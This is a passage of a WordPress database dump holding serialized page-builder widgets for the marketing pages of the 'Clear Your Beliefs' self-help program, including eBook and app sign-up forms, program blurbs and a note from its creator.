found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1185, 1667, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:952:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script><br /></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2786:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul>\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1184, 1666, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:435:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:728:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -17px; margin-bottom: -37px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" /></center>\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n<center style="margin-top: -14px;"><div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:952:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 46px; margin-bottom: -14px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 64px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script><br /></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:3048:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.</p><p>All of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.</p><p>So the important questions are:</p><ul><li> <em>What do I want to experience?</em></li><li><em>What belief is creating this experience I don''t want?</em></li><li><em>How can I change my belief so I can change my experience?</em></li></ul><p><strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em></p><p>I''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em></p><p>If you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.</p><p><strong>Did I mention that it’s easy? And also a lot of fun?</strong></p><p>I look forward to hearing your feedback.  I’m always available to you to support your journey.</p><p>Warmly,</p><p><img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" /></p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1371, 1817, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1182:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" />\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big></p><br>\n<form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form>	<script 